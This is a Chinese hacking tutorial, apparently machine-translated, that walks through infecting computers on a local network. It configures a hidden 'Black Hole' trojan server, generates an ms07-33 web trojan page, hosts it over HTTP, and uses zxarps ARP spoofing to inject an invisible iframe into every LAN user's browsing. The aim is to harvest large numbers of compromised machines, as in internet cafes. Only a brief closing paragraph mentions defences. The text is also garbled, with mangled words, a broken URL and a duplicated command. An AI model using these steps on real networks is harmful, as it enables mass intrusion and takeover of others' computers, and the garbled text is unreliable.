网页的马是在今天的袭击中很受欢迎，这种方式不需要花太多精力去接近等。但是效率比较，网页木马可以更高。但主要的安全厂商和用户安全意识的不断提高，网页马通过成功的概率是逐渐降低的保护。但是现在，一个新的马的出现是马ARP欺骗，传播速度比普通网页马快很多。

局域网ARP欺骗木马以下好处：没有入侵网站，只要你的主机在局域网可以，这是最大的优点；肉鸡收获很多，很短的时间内就可以收获几十甚至几百套鸡，类似于网吧，包括在一个地区的数百台电脑集团挂马的最好的地方；局域网用户访问木马过我们的网站将在。看了上面的介绍，你是不是？已经蠢蠢欲动？

第一步：木马服务器配置

我们以“黑洞”木马为例。运行“黑洞”木马client.exe文件，主界面为client.exe，点击“文件，创建一个DLL插入版本服务器程序”。

输入服务器程序创建界面，首先检查“Win NT／2000／XP／2003隐藏在服务器文件，注册表，进程和服务，然后切换到“连接”选项”选项卡，在机器的公共IP地址栏填写“主机”，端口可以保持默认的“2007”。最后，在“连接密码”用于连接彼此的密码，例如123456。设置完成后，点击“生成”按钮，将木马作为一个muma.exe服务器。

第二步：网页木马的一代

因为它是一匹马，那当然不是网页木马的缺乏。在这里，我们使用“ms07-33功发生器”为例。运行“ms07-33功发生器”，进入VAR地址文本框的马路，因为我们将设置HTTP服务，所以这里应该填写“HTTP：/ / 192.168.0.2 /牧马。EXE”，其中192.168.0.2局域网中机器的IP地址。单击“生成变量”按钮生成VaR hackll.htm

第三步：打开HTTP服务

让局域网中的其他主机可以访问我们的VAR，会对机器的HTTP服务。下载宝贝的Web服务器，这是一个简单的Web服务器软件，下载后直接运行，在主界面中的“服务设置”。

“网站目录”的网页木马的地方如根“C设置：C：\“。点击“OK”的主界面，然后点击“开始”按钮打开机器的HTTP服务。记得带马到根目录服务器和网页木马C.

第四步：局域网ARP欺骗木马

最后，请我们的主角了，上文中提到的工具，这个工具称为zxarps，是一种通过局域网ARP欺骗马的工具。使用前要安装winpcap的zxarps，这是基本的网络驱动程序包，没有它，zxarps将不运行。

安装后将zxarps任何目录，然后运行命令提示符，输入zxarps目录，然后输入命令：zxarps.exe -IDX 0 IP 192.168.0.1-192.168.0.255端口80 -插入”

安装后将zxarps任何目录，然后运行命令提示符，输入zxarps目录，然后输入命令：zxarps.exe - IDX 0 IP 192.168.0.1-192.168.0.255端口80插入“< iframe src= 'http://localhost' / 192.168.0.2 /海克尔。htm'width = 0高度= 0 >”。进入赛马会成功的。

从现在起，无论是局域网用户访问网站，将运行的网页木马我们，因为在用户的zxarps打开网页的同时有马代码到正常的页面。

ARP欺骗防御技能挂马

从以上zxarps可见的功能确实是非常强大的，但它是基于ARP欺骗的原理，只要局域网内的主机可以抵抗的ARP欺骗攻击，马法可以完全忽略zxarps。

网络管理将主机上的所有IP地址和MAC地址的局域网的结合。我们还可以下载“360arp防火墙”对ARP欺骗攻击